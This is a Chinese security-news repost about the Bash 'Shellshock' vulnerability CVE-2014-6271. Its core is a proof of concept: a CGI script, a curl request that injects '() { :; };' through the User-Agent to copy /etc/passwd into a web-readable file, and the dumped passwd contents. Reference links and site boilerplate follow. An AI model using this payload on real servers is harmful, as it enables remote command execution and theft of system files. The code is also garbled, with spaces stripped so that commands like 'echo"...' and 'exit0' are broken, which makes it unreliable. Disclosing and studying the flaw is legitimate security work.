未加星标

CVE-2014-6271--Bash漏洞相关

字体大小 | |
[业界资讯 所属分类 业界资讯 | 发布者 店小二03 | 时间 | 作者 红领巾 ] 0人收藏点击收藏
CVE-2014-6271--Bash漏洞相关 2014-09-26 01:22:14 来源:乌云社区 作者:360安全播报
CVE-2014-6271--Bash漏洞相关

poc.cgi

#!/bin/bash echo"Content-type:text/html" echo"" echo'<html>' echo'<head>' echo'<metahttp-equiv="Content-Type"content="text/html;charset=UTF-8">' echo'<title>PoC</title>' echo'</head>' echo'<body>' echo'<pre>' /usr/bin/env echo'</pre>' echo'</body>' echo'</html>' exit0

$ curl -A ‘() { :; }; /bin/cat /etc/passwd > dumped_file’ http://192.168.0.1/poc.cgi

<!DOCTYPEHTMLPUBLIC"-//IETF//DTDHTML2.0//EN"> <html><head> <title>500InternalServerError</title> </head><body> <h1>InternalServerError</h1> <p>Theserverencounteredaninternalerroror misconfigurationandwasunabletocomplete yourrequest.</p> <p>Pleasecontacttheserveradministrator, webmaster@localhostandinformthemofthetimetheerroroccurred, andanythingyoumighthavedonethatmayhave causedtheerror.</p> <p>Moreinformationaboutthiserrormaybeavailable intheservererrorlog.</p> <hr> <address>Apache/2.2.22(Debian)Serverat192.168.0.1Port80</address> </body></html>

$ curl http://192.168.0.1/dumped_file

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:MailingListManager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:GnatsBug-ReportingSystem(admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

相关链接:

http://marc.info/?l=oss-security&m=141157106132018&w=2

http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

http://seclists.org/oss-sec/2014/q3/650

http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNKRufIZWN

http://pastebin.com/8NRv7s1Z

http://pastebin.com/kQ5ppEZD

http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html

http://permalink.gmane.org/gmane.comp.security.oss.general/13852?utm_source=twitterfeed&utm_medium=twitter


PS:ModSecurity声称已经针对CVE-2014-6271完善了过滤规则。

本文转载自 乌云社区
原文链接:http://zone.wooyun.org/content/15392

本文业界资讯相关术语:网络安全论文 网络安全密钥 网络安全工程师 网络安全技术与应用 网络安全概念股 网络安全知识 网络安全宣传周 网络安全知识竞赛 网络安全事件

主题: DebianHTML360UBUT
tags: gt,lt,bin,var,echo,html,com,http,spool,usr,body,title,head
分页:12
转载请注明
本文标题:CVE-2014-6271--Bash漏洞相关
本站链接:https://www.codesec.net/view/413985.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 业界资讯 | 评论(0) | 阅读(331)